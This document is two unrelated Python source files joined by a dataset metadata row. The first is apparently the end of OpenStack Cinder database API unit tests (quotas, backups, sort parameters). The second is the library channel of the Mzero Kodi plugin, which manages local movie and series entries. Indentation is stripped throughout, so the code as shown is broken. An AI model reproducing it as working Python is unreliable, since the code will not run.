for i in range(3):
quotas_db = db.quota_get_all_by_project(self.ctxt, 'proj%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'res0': 0,
'res1': 1,
'res2': 2})
def test_quota_update(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
db.quota_update(self.ctxt, 'project1', 'resource1', 42)
quota = db.quota_get(self.ctxt, 'project1', 'resource1')
self.assertEqual(quota.hard_limit, 42)
self.assertEqual(quota.resource, 'resource1')
self.assertEqual(quota.project_id, 'project1')
def test_quota_update_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_update,
self.ctxt,
'project1',
'resource1',
42)
def test_quota_get_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_get,
self.ctxt,
'project1',
'resource1')
def test_quota_reserve(self):
reservations = _quota_reserve(self.ctxt, 'project1')
self.assertEqual(len(reservations), 2)
quota_usage = db.quota_usage_get_all_by_project(self.ctxt, 'project1')
self.assertEqual({'project_id': 'project1',
'gigabytes': {'reserved': 2, 'in_use': 0},
'volumes': {'reserved': 1, 'in_use': 0}},
quota_usage)
def test_quota_destroy(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
self.assertIsNone(db.quota_destroy(self.ctxt, 'project1',
'resource1'))
self.assertRaises(exception.ProjectQuotaNotFound, db.quota_get,
self.ctxt, 'project1', 'resource1')
def test_quota_destroy_by_project(self):
# Create limits, reservations and usage for project
project = 'project1'
_quota_reserve(self.ctxt, project)
expected_usage = {'project_id': project,
'volumes': {'reserved': 1, 'in_use': 0},
'gigabytes': {'reserved': 2, 'in_use': 0}}
expected = {'project_id': project, 'gigabytes': 2, 'volumes': 1}
# Check that quotas are there
self.assertEqual(expected,
db.quota_get_all_by_project(self.ctxt, project))
self.assertEqual(expected_usage,
db.quota_usage_get_all_by_project(self.ctxt, project))
# Destroy only the limits
db.quota_destroy_by_project(self.ctxt, project)
# Confirm that limits have been removed
self.assertEqual({'project_id': project},
db.quota_get_all_by_project(self.ctxt, project))
# But that usage and reservations are the same
self.assertEqual(expected_usage,
db.quota_usage_get_all_by_project(self.ctxt, project))
def test_quota_destroy_sqlalchemy_all_by_project_(self):
# Create limits, reservations and usage for project
project = 'project1'
_quota_reserve(self.ctxt, project)
expected_usage = {'project_id': project,
'volumes': {'reserved': 1, 'in_use': 0},
'gigabytes': {'reserved': 2, 'in_use': 0}}
expected = {'project_id': project, 'gigabytes': 2, 'volumes': 1}
expected_result = {'project_id': project}
# Check that quotas are there
self.assertEqual(expected,
db.quota_get_all_by_project(self.ctxt, project))
self.assertEqual(expected_usage,
db.quota_usage_get_all_by_project(self.ctxt, project))
# Destroy all quotas using SQLAlchemy Implementation
sqlalchemy_api.quota_destroy_all_by_project(self.ctxt, project,
only_quotas=False)
# Check that all quotas have been deleted
self.assertEqual(expected_result,
db.quota_get_all_by_project(self.ctxt, project))
self.assertEqual(expected_result,
db.quota_usage_get_all_by_project(self.ctxt, project))
def test_quota_usage_get_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound,
db.quota_usage_get,
self.ctxt,
'p1',
'nonexitent_resource')
def test_quota_usage_get(self):
_quota_reserve(self.ctxt, 'p1')
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'gigabytes')
expected = {'resource': 'gigabytes', 'project_id': 'p1',
'in_use': 0, 'reserved': 2, 'total': 2}
for key, value in expected.iteritems():
self.assertEqual(value, quota_usage[key], key)
def test_quota_usage_get_all_by_project(self):
_quota_reserve(self.ctxt, 'p1')
expected = {'project_id': 'p1',
'volumes': {'in_use': 0, 'reserved': 1},
'gigabytes': {'in_use': 0, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project(
self.ctxt, 'p1'))
class DBAPIIscsiTargetTestCase(BaseTest):
"""Unit tests for cinder.db.api.iscsi_target_*."""
def _get_base_values(self):
return {'target_num': 10, 'host': 'fake_host'}
def test_iscsi_target_create_safe(self):
target = db.iscsi_target_create_safe(self.ctxt,
self._get_base_values())
self.assertTrue(target['id'])
self.assertEqual(target['host'], 'fake_host')
self.assertEqual(target['target_num'], 10)
def test_iscsi_target_count_by_host(self):
for i in range(3):
values = self._get_base_values()
values['target_num'] += i
db.iscsi_target_create_safe(self.ctxt, values)
self.assertEqual(db.iscsi_target_count_by_host(self.ctxt, 'fake_host'),
3)
def test_integrity_error(self):
values = self._get_base_values()
values['id'] = 1
db.iscsi_target_create_safe(self.ctxt, values)
self.assertFalse(db.iscsi_target_create_safe(self.ctxt, values))
class DBAPIBackupTestCase(BaseTest):
"""Tests for db.api.backup_* methods."""
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(DBAPIBackupTestCase, self).setUp()
self.created = [db.backup_create(self.ctxt, values)
for values in self._get_values()]
def _get_values(self, one=False):
base_values = {
'user_id': 'user',
'project_id': 'project',
'volume_id': 'volume',
'host': 'host',
'availability_zone': 'zone',
'display_name': 'display',
'display_description': 'description',
'container': 'container',
'status': 'status',
'fail_reason': 'test',
'service_metadata': 'metadata',
'service': 'service',
'parent_id': "parent_id",
'size': 1000,
'object_count': 100}
if one:
return base_values
def compose(val, step):
if isinstance(val, bool):
return val
if isinstance(val, str):
step = str(step)
return val + step
return [dict([(k, compose(v, i)) for k, v in base_values.items()])
for i in range(1, 4)]
def test_backup_create(self):
values = self._get_values()
for i, backup in enumerate(self.created):
self.assertTrue(backup['id'])
self._assertEqualObjects(values[i], backup, self._ignored_keys)
def test_backup_get(self):
for backup in self.created:
backup_get = db.backup_get(self.ctxt, backup['id'])
self._assertEqualObjects(backup, backup_get)
def tests_backup_get_all(self):
all_backups = db.backup_get_all(self.ctxt)
self._assertEqualListsOfObjects(self.created, all_backups)
def tests_backup_get_all_by_filter(self):
filters = {'status': self.created[1]['status']}
filtered_backups = db.backup_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects([self.created[1]], filtered_backups)
filters = {'display_name': self.created[1]['display_name']}
filtered_backups = db.backup_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects([self.created[1]], filtered_backups)
filters = {'volume_id': self.created[1]['volume_id']}
filtered_backups = db.backup_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects([self.created[1]], filtered_backups)
def test_backup_get_all_by_host(self):
byhost = db.backup_get_all_by_host(self.ctxt,
self.created[1]['host'])
self._assertEqualObjects(self.created[1], byhost[0])
def test_backup_get_all_by_project(self):
byproj = db.backup_get_all_by_project(self.ctxt,
self.created[1]['project_id'])
self._assertEqualObjects(self.created[1], byproj[0])
def test_backup_update_nonexistent(self):
self.assertRaises(exception.BackupNotFound,
db.backup_update,
self.ctxt, 'nonexistent', {})
def test_backup_update(self):
updated_values = self._get_values(one=True)
update_id = self.created[1]['id']
updated_backup = db.backup_update(self.ctxt, update_id,
updated_values)
self._assertEqualObjects(updated_values, updated_backup,
self._ignored_keys)
def test_backup_update_with_fail_reason_truncation(self):
updated_values = self._get_values(one=True)
fail_reason = '0' * 512
updated_values['fail_reason'] = fail_reason
update_id = self.created[1]['id']
updated_backup = db.backup_update(self.ctxt, update_id,
updated_values)
updated_values['fail_reason'] = fail_reason[:255]
self._assertEqualObjects(updated_values, updated_backup,
self._ignored_keys)
def test_backup_destroy(self):
for backup in self.created:
db.backup_destroy(self.ctxt, backup['id'])
self.assertFalse(db.backup_get_all(self.ctxt))
def test_backup_not_found(self):
self.assertRaises(exception.BackupNotFound, db.backup_get, self.ctxt,
'notinbase')
class DBAPIProcessSortParamTestCase(test.TestCase):
def test_process_sort_params_defaults(self):
'''Verifies default sort parameters.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params([], [])
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(None, None)
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_keys(self):
'''Verifies that the default keys can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'])
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_dir(self):
'''Verifies that the default direction can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_dir='dir1')
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['dir1', 'dir1'], sort_dirs)
def test_process_sort_params_override_default_key_and_dir(self):
'''Verifies that the default key and dir can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'],
default_dir='dir1')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir1', 'dir1'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=[], default_dir='dir1')
self.assertEqual([], sort_keys)
self.assertEqual([], sort_dirs)
def test_process_sort_params_non_default(self):
'''Verifies that non-default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['key1', 'key2'], ['asc', 'desc'])
self.assertEqual(['key1', 'key2', 'created_at', 'id'], sort_keys)
# First sort_dir in list is used when adding the default keys
self.assertEqual(['asc', 'desc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default(self):
'''Verifies that default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['asc', 'desc'])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'desc', 'asc'], sort_dirs)
# Include default key value, rely on default direction
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default_dir(self):
'''Verifies that the default dir is applied to all keys.'''
# Direction is set, ignore default dir
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['desc'], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc'], sort_dirs)
# But should be used if no direction is set
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['dir', 'dir', 'dir'], sort_dirs)
def test_process_sort_params_unequal_length(self):
'''Verifies that a sort direction list is applied correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc', 'desc'], sort_dirs)
# Default direction is the first key in the list
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'desc', 'desc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'asc', 'desc'], sort_dirs)
def test_process_sort_params_extra_dirs_lengths(self):
'''InvalidInput raised if more directions are given.'''
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key1', 'key2'],
['asc', 'desc', 'desc'])
def test_process_sort_params_invalid_sort_dir(self):
'''InvalidInput raised if invalid directions are given.'''
for dirs in [['foo'], ['asc', 'foo'], ['asc', 'desc', 'foo']]:
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key'],
dirs)
class DBAPIDriverInitiatorDataTestCase(BaseTest):
initiator = 'iqn.1993-08.org.debian:01:222'
namespace = 'test_ns'
def test_driver_initiator_data_set_and_remove(self):
data_key = 'key1'
data_value = 'value1'
update = {
'set_values': {
data_key: data_value
}
}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
data = db.driver_initiator_data_get(self.ctxt, self.initiator,
self.namespace)
self.assertIsNotNone(data)
self.assertEqual(data_key, data[0]['key'])
self.assertEqual(data_value, data[0]['value'])
update = {'remove_values': [data_key]}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
data = db.driver_initiator_data_get(self.ctxt, self.initiator,
self.namespace)
self.assertIsNotNone(data)
self.assertEqual([], data)
def test_driver_initiator_data_no_changes(self):
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, {})
data = db.driver_initiator_data_get(self.ctxt, self.initiator,
self.namespace)
self.assertIsNotNone(data)
self.assertEqual([], data)
def test_driver_initiator_data_update_existing_values(self):
data_key = 'key1'
data_value = 'value1'
update = {'set_values': {data_key: data_value}}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
data_value = 'value2'
update = {'set_values': {data_key: data_value}}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
data = db.driver_initiator_data_get(self.ctxt, self.initiator,
self.namespace)
self.assertEqual(data_value, data[0]['value'])
def test_driver_initiator_data_remove_not_existing(self):
update = {'remove_values': ['key_that_doesnt_exist']}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
| apache-2.0 | -9,099,845,731,141,413,000 | 43.838286 | 79 | 0.515338 | false |
Mzero2010/MaxZone | plugin.video.Mzero/channels/biblioteca.py | 1 | 26859 | # -*- coding: utf-8 -*-
# ------------------------------------------------------------
# Mzero - XBMC Plugin
# Canal para biblioteca de Mzero
# http://blog.tvalacarta.info/plugin-xbmc/Mzero/
# ------------------------------------------------------------
import os
from core import config
from core import filetools
from core import logger
from core import scrapertools
from core.item import Item
from core import library
from platformcode import platformtools
def mainlist(item):
logger.info()
itemlist = list()
itemlist.append(Item(channel=item.channel, action="peliculas", title="Películas",
category="Biblioteca de películas",
thumbnail="http://media.tvalacarta.info/Mzero/squares/thumb_biblioteca_peliculas.png"))
itemlist.append(Item(channel=item.channel, action="series", title="Series",
category="Biblioteca de series",
thumbnail="http://media.tvalacarta.info/Mzero/squares/thumb_biblioteca_series.png"))
#itemlist.append(Item(channel=item.channel, title="", action="", folder=False, thumbnail=item.thumbnail))
#itemlist.append(Item(channel=item.channel, action="channel_config", title="Opciones"))
return itemlist
def channel_config(item):
return platformtools.show_channel_settings(channelpath=os.path.join(config.get_runtime_path(),"channels", item.channel))
def peliculas(item):
logger.info()
itemlist = []
for raiz, subcarpetas, ficheros in filetools.walk(library.MOVIES_PATH):
for f in ficheros:
if f.endswith(".nfo"):
nfo_path = filetools.join(raiz, f)
head_nfo, new_item = library.read_nfo(nfo_path)
new_item.nfo = nfo_path
new_item.path = raiz
new_item.thumbnail = new_item.contentThumbnail
new_item.text_color = "blue"
if not filetools.exists(filetools.join(new_item.path, filetools.basename(new_item.strm_path))):
# Si se ha eliminado el strm desde la bilbioteca de kodi, no mostrarlo
continue
# Menu contextual: Marcar como visto/no visto
visto = new_item.library_playcounts.get(os.path.splitext(f)[0], 0)
new_item.infoLabels["playcount"] = visto
if visto > 0:
texto_visto = "Marcar película como no vista"
contador = 0
else:
texto_visto = "Marcar película como vista"
contador = 1
# Menu contextual: Eliminar serie/canal
num_canales = len(new_item.library_urls)
if "descargas" in new_item.library_urls:
num_canales -= 1
if num_canales > 1:
texto_eliminar = "Eliminar película/canal"
multicanal = True
else:
texto_eliminar = "Eliminar esta película"
multicanal = False
new_item.context = [{"title": texto_visto,
"action": "mark_content_as_watched",
"channel": "biblioteca",
"playcount": contador},
{"title": texto_eliminar,
"action": "eliminar",
"channel": "biblioteca",
"multicanal": multicanal}]
# ,{"title": "Cambiar contenido (PENDIENTE)",
# "action": "",
# "channel": "biblioteca"}]
#logger.debug("new_item: " + new_item.tostring('\n'))
itemlist.append(new_item)
return sorted(itemlist, key=lambda it: it.title.lower())
def series(item):
logger.info()
itemlist = []
# Obtenemos todos los tvshow.nfo de la biblioteca de SERIES recursivamente
for raiz, subcarpetas, ficheros in filetools.walk(library.TVSHOWS_PATH):
for f in ficheros:
if f == "tvshow.nfo":
tvshow_path = filetools.join(raiz, f)
# logger.debug(tvshow_path)
head_nfo, item_tvshow = library.read_nfo(tvshow_path)
item_tvshow.title = item_tvshow.contentTitle
item_tvshow.path = raiz
item_tvshow.nfo = tvshow_path
# Menu contextual: Marcar como visto/no visto
visto = item_tvshow.library_playcounts.get(item_tvshow.contentTitle, 0)
item_tvshow.infoLabels["playcount"] = visto
if visto > 0:
texto_visto = "Marcar serie como no vista"
contador = 0
else:
texto_visto = "Marcar serie como vista"
contador = 1
# Menu contextual: Buscar automáticamente nuevos episodios o no
if item_tvshow.active and int(item_tvshow.active) > 0:
texto_update = "Buscar automáticamente nuevos episodios: Desactivar"
value = 0
item_tvshow.text_color = "green"
else:
texto_update = "Buscar automáticamente nuevos episodios: Activar"
value = 1
item_tvshow.text_color = "0xFFDF7401"
# Menu contextual: Eliminar serie/canal
num_canales = len(item_tvshow.library_urls)
if "descargas" in item_tvshow.library_urls:
num_canales -= 1
if num_canales > 1:
texto_eliminar = "Eliminar serie/canal"
multicanal = True
else:
texto_eliminar = "Eliminar esta serie"
multicanal = False
item_tvshow.context = [{"title": texto_visto,
"action": "mark_content_as_watched",
"channel": "biblioteca",
"playcount": contador},
{"title": texto_update,
"action": "mark_tvshow_as_updatable",
"channel": "biblioteca",
"active": value},
{"title": texto_eliminar,
"action": "eliminar",
"channel": "biblioteca",
"multicanal": multicanal},
{"title": "Buscar nuevos episodios ahora",
"action": "update_serie",
"channel":"biblioteca"}]
# ,{"title": "Cambiar contenido (PENDIENTE)",
# "action": "",
# "channel": "biblioteca"}]
# logger.debug("item_tvshow:\n" + item_tvshow.tostring('\n'))
itemlist.append(item_tvshow)
if itemlist:
itemlist = sorted(itemlist, key=lambda it: it.title.lower())
itemlist.append(Item(channel=item.channel, action="update_biblio", thumbnail=item.thumbnail,
title="Buscar nuevos episodios y actualizar biblioteca", folder=False))
return itemlist
def get_temporadas(item):
logger.info()
# logger.debug("item:\n" + item.tostring('\n'))
itemlist = []
dict_temp = {}
raiz, carpetas_series, ficheros = filetools.walk(item.path).next()
# Menu contextual: Releer tvshow.nfo
head_nfo, item_nfo = library.read_nfo(item.nfo)
if config.get_setting("no_pile_on_seasons", "biblioteca") == 2: # Siempre
return get_episodios(item)
for f in ficheros:
if f.endswith('.json'):
season = f.split('x')[0]
dict_temp[season] = "Temporada %s" % season
if config.get_setting("no_pile_on_seasons", "biblioteca") == 1 and len(dict_temp) == 1: # Sólo si hay una temporada
return get_episodios(item)
else:
# Creamos un item por cada temporada
for season, title in dict_temp.items():
new_item = item.clone(action="get_episodios", title=title, contentSeason=season,
filtrar_season=True)
# Menu contextual: Marcar la temporada como vista o no
visto = item_nfo.library_playcounts.get("season %s" % season, 0)
new_item.infoLabels["playcount"] = visto
if visto > 0:
texto = "Marcar temporada como no vista"
value = 0
else:
texto = "Marcar temporada como vista"
value = 1
new_item.context = [{"title": texto,
"action": "mark_season_as_watched",
"channel": "biblioteca",
"playcount": value}]
# logger.debug("new_item:\n" + new_item.tostring('\n'))
itemlist.append(new_item)
if len(itemlist) > 1:
itemlist = sorted(itemlist, key=lambda it: int(it.contentSeason))
if config.get_setting("show_all_seasons", "biblioteca") == True:
new_item = item.clone(action="get_episodios", title="*Todas las temporadas")
new_item.infoLabels["playcount"] = 0
itemlist.insert(0, new_item)
return itemlist
def get_episodios(item):
logger.info()
#logger.debug("item:\n" + item.tostring('\n'))
itemlist = []
# Obtenemos los archivos de los episodios
raiz, carpetas_series, ficheros = filetools.walk(item.path).next()
# Menu contextual: Releer tvshow.nfo
head_nfo, item_nfo = library.read_nfo(item.nfo)
# Crear un item en la lista para cada strm encontrado
for i in ficheros:
if i.endswith('.strm'):
season_episode = scrapertools.get_season_and_episode(i)
if not season_episode:
# El fichero no incluye el numero de temporada y episodio
continue
season, episode = season_episode.split("x")
# Si hay q filtrar por temporada, ignoramos los capitulos de otras temporadas
if item.filtrar_season and int(season) != int(item.contentSeason):
continue
# Obtener los datos del season_episode.nfo
nfo_path = filetools.join(raiz, i).replace('.strm', '.nfo')
head_nfo, epi = library.read_nfo(nfo_path)
# Fijar el titulo del capitulo si es posible
if epi.contentTitle:
title_episodie = epi.contentTitle.strip()
else:
title_episodie = "Temporada %s Episodio %s" % \
(epi.contentSeason, str(epi.contentEpisodeNumber).zfill(2))
epi.contentTitle = "%sx%s" % (epi.contentSeason, str(epi.contentEpisodeNumber).zfill(2))
epi.title = "%sx%s - %s" % (epi.contentSeason, str(epi.contentEpisodeNumber).zfill(2), title_episodie)
if item_nfo.library_filter_show:
epi.library_filter_show = item_nfo.library_filter_show
# Menu contextual: Marcar episodio como visto o no
visto = item_nfo.library_playcounts.get(season_episode, 0)
epi.infoLabels["playcount"] = visto
if visto > 0:
texto = "Marcar episodio como no visto"
value = 0
else:
texto = "Marcar episodio como visto"
value = 1
epi.context = [{"title": texto,
"action": "mark_content_as_watched",
"channel": "biblioteca",
"playcount": value,
"nfo": item.nfo}]
# logger.debug("epi:\n" + epi.tostring('\n'))
itemlist.append(epi)
return sorted(itemlist, key=lambda it: (int(it.contentSeason), int(it.contentEpisodeNumber)))
def findvideos(item):
logger.info()
# logger.debug("item:\n" + item.tostring('\n'))
itemlist = []
list_canales = {}
item_local = None
if not item.contentTitle or not item.strm_path:
logger.debug("No se pueden buscar videos por falta de parametros")
return []
content_title = filter(lambda c: c not in ":*?<>|\/", item.contentTitle).strip().lower()
if item.contentType == 'movie':
item.strm_path = filetools.join(library.MOVIES_PATH, item.strm_path.strip('\/'))
path_dir = os.path.dirname(item.strm_path)
item.nfo = filetools.join(path_dir, os.path.basename(path_dir) + ".nfo")
else:
item.strm_path = filetools.join(library.TVSHOWS_PATH, item.strm_path.strip('\/'))
path_dir = os.path.dirname(item.strm_path)
item.nfo = filetools.join(path_dir, 'tvshow.nfo')
for fd in filetools.listdir(path_dir):
if fd.endswith('.json'):
contenido, nom_canal = fd[:-6].split('[')
if (content_title in contenido.strip() or item.contentType == 'movie') and nom_canal not in \
list_canales.keys():
list_canales[nom_canal] = filetools.join(path_dir, fd)
num_canales = len(list_canales)
if 'descargas' in list_canales:
json_path = list_canales['descargas']
item_json = Item().fromjson(filetools.read(json_path))
#Soporte para rutas relativas en descargas
if filetools.is_relative(item_json.url):
item_json.url = filetools.join(library.LIBRARY_PATH,item_json.url)
del list_canales['descargas']
# Comprobar q el video no haya sido borrado
if filetools.exists(item_json.url):
item_local = item_json.clone(action='play')
itemlist.append(item_local)
else:
num_canales -= 1
filtro_canal = ''
if num_canales > 1 and config.get_setting("ask_channel", "biblioteca") == True:
opciones = ["Mostrar solo los enlaces de %s" % k.capitalize() for k in list_canales.keys()]
opciones.insert(0, "Mostrar todos los enlaces")
if item_local:
opciones.append(item_local.title)
from platformcode import platformtools
index = platformtools.dialog_select(config.get_localized_string(30163), opciones)
if index < 0:
return []
elif item_local and index == len(opciones) - 1:
filtro_canal = 'descargas'
platformtools.play_video(item_local)
elif index > 0:
filtro_canal = opciones[index].replace("Mostrar solo los enlaces de ", "")
itemlist = []
for nom_canal, json_path in list_canales.items():
if filtro_canal and filtro_canal != nom_canal.capitalize():
continue
# Importamos el canal de la parte seleccionada
try:
channel = __import__('channels.%s' % nom_canal, fromlist=["channels.%s" % nom_canal])
except ImportError:
exec "import channels." + nom_canal + " as channel"
item_json = Item().fromjson(filetools.read(json_path))
list_servers = []
try:
# FILTERTOOLS
# si el canal tiene filtro se le pasa el nombre que tiene guardado para que filtre correctamente.
if "list_idiomas" in item_json:
# si se viene desde la biblioteca de Mzero
if "library_filter_show" in item:
item_json.show = item.library_filter_show.get(nom_canal, "")
# Ejecutamos find_videos, del canal o común
if hasattr(channel, 'findvideos'):
list_servers = getattr(channel, 'findvideos')(item_json)
else:
from core import servertools
list_servers = servertools.find_video_items(item_json)
except Exception as ex:
logger.error("Ha fallado la funcion findvideos para el canal %s" % nom_canal)
template = "An exception of type {0} occured. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
logger.error(message)
# Cambiarle el titulo a los servers añadiendoles el nombre del canal delante y
# las infoLabels y las imagenes del item si el server no tiene
for server in list_servers:
if not server.action: # Ignorar las etiquetas
continue
server.contentChannel = server.channel
server.channel = "biblioteca"
server.nfo = item.nfo
server.strm_path = item.strm_path
server.title = "%s: %s" % (nom_canal.capitalize(), server.title)
server.infoLabels = item_json.infoLabels
if not server.thumbnail:
server.thumbnail = item.thumbnail
#logger.debug("server:\n%s" % server.tostring('\n'))
itemlist.append(server)
# return sorted(itemlist, key=lambda it: it.title.lower())
return itemlist
def play(item):
logger.info()
#logger.debug("item:\n" + item.tostring('\n'))
if not item.contentChannel == "local":
channel = __import__('channels.%s' % item.contentChannel, fromlist=["channels.%s" % item.contentChannel])
if hasattr(channel, "play"):
itemlist = getattr(channel, "play")(item)
else:
itemlist = [item.clone()]
else:
itemlist = [item.clone(url=item.strm_path, server="local")]
# Esto es necesario por si el play del canal elimina los datos
for v in itemlist:
v.nfo = item.nfo
v.strm_path = item.strm_path
v.infoLabels = item.infoLabels
if item.contentTitle:
v.title = item.contentTitle
else:
if item.contentType == "episode":
v.title = "Episodio %s" % item.contentEpisodeNumber
v.thumbnail = item.thumbnail
v.contentThumbnail = item.thumbnail
return itemlist
def update_biblio(item):
logger.info()
# Actualizar las series activas sobreescribiendo
import library_service
library_service.check_for_update(overwrite=True)
# Eliminar las carpetas de peliculas que no contengan archivo strm
for raiz, subcarpetas, ficheros in filetools.walk(library.MOVIES_PATH):
strm = False
for f in ficheros:
if f.endswith(".strm"):
strm = True
break
if ficheros and not strm:
logger.debug("Borrando carpeta de pelicula eliminada: %s" % raiz)
filetools.rmdirtree(raiz)
# metodos de menu contextual
def update_serie(item):
logger.info()
#logger.debug("item:\n" + item.tostring('\n'))
heading = 'Actualizando serie....'
p_dialog = platformtools.dialog_progress_bg('Mzero', heading)
p_dialog.update(0, heading, item.contentSerieName)
import library_service
if library_service.update(item.path, p_dialog, 1, 1, item, False) and config.is_xbmc():
from platformcode import xbmc_library
xbmc_library.update(folder=filetools.basename(item.path))
p_dialog.close()
def mark_content_as_watched(item):
logger.info()
# logger.debug("item:\n" + item.tostring('\n'))
if filetools.exists(item.nfo):
head_nfo = filetools.read(item.nfo, 0, 1)
it = Item().fromjson(filetools.read(item.nfo, 1))
if item.contentType == 'movie':
name_file = os.path.splitext(os.path.basename(item.nfo))[0]
elif item.contentType == 'episode':
name_file = "%sx%s" % (item.contentSeason, str(item.contentEpisodeNumber).zfill(2))
else:
name_file = item.contentTitle
if not hasattr(it, 'library_playcounts'):
it.library_playcounts = {}
it.library_playcounts.update({name_file: item.playcount})
# se comprueba que si todos los episodios de una temporada están marcados, se marque tb la temporada
if item.contentType != 'movie':
it = check_season_playcount(it, item.contentSeason)
# Guardamos los cambios en item.nfo
if filetools.write(item.nfo, head_nfo + it.tojson()):
item.infoLabels['playcount'] = item.playcount
if item.contentType == 'tvshow':
# Actualizar toda la serie
new_item = item.clone(contentSeason=-1)
mark_season_as_watched(new_item)
if config.is_xbmc():
from platformcode import xbmc_library
xbmc_library.mark_content_as_watched_on_kodi(item, item.playcount)
platformtools.itemlist_refresh()
def mark_season_as_watched(item):
logger.info()
# logger.debug("item:\n" + item.tostring('\n'))
# Obtener el diccionario de episodios marcados
f = filetools.join(item.path, 'tvshow.nfo')
head_nfo, it = library.read_nfo(f)
if not hasattr(it, 'library_playcounts'):
it.library_playcounts = {}
# Obtenemos los archivos de los episodios
raiz, carpetas_series, ficheros = filetools.walk(item.path).next()
# Marcamos cada uno de los episodios encontrados de esta temporada
episodios_marcados = 0
for i in ficheros:
if i.endswith(".strm"):
season_episode = scrapertools.get_season_and_episode(i)
if not season_episode:
# El fichero no incluye el numero de temporada y episodio
continue
season, episode = season_episode.split("x")
if int(item.contentSeason) == -1 or int(season) == int(item.contentSeason):
name_file = os.path.splitext(os.path.basename(i))[0]
it.library_playcounts[name_file] = item.playcount
episodios_marcados += 1
if episodios_marcados:
if int(item.contentSeason) == -1:
# Añadimos todas las temporadas al diccionario item.library_playcounts
for k in it.library_playcounts.keys():
if k.startswith("season"):
it.library_playcounts[k] = item.playcount
else:
# Añadimos la temporada al diccionario item.library_playcounts
it.library_playcounts["season %s" % item.contentSeason] = item.playcount
# se comprueba que si todas las temporadas están vistas, se marque la serie como vista
it = check_tvshow_playcount(it, item.contentSeason)
# Guardamos los cambios en tvshow.nfo
filetools.write(f, head_nfo + it.tojson())
item.infoLabels['playcount'] = item.playcount
if config.is_xbmc():
# Actualizamos la BBDD de Kodi
from platformcode import xbmc_library
xbmc_library.mark_season_as_watched_on_kodi(item, item.playcount)
platformtools.itemlist_refresh()
def mark_tvshow_as_updatable(item):
logger.info()
head_nfo, it = library.read_nfo(item.nfo)
it.active = item.active
filetools.write(item.nfo, head_nfo + it.tojson())
platformtools.itemlist_refresh()
def eliminar(item):
def eliminar_todo(item):
filetools.rmdirtree(item.path)
if config.is_xbmc():
import xbmc
# esperamos 3 segundos para dar tiempo a borrar los ficheros
xbmc.sleep(3000)
# TODO mirar por qué no funciona al limpiar en la biblioteca de Kodi al añadirle un path
# limpiamos la biblioteca de Kodi
from platformcode import xbmc_library
xbmc_library.clean()
logger.info("Eliminados todos los enlaces")
platformtools.itemlist_refresh()
logger.info(item.contentTitle)
#logger.debug(item.tostring('\n'))
if item.contentType == 'movie':
heading = "Eliminar película"
else:
heading = "Eliminar serie"
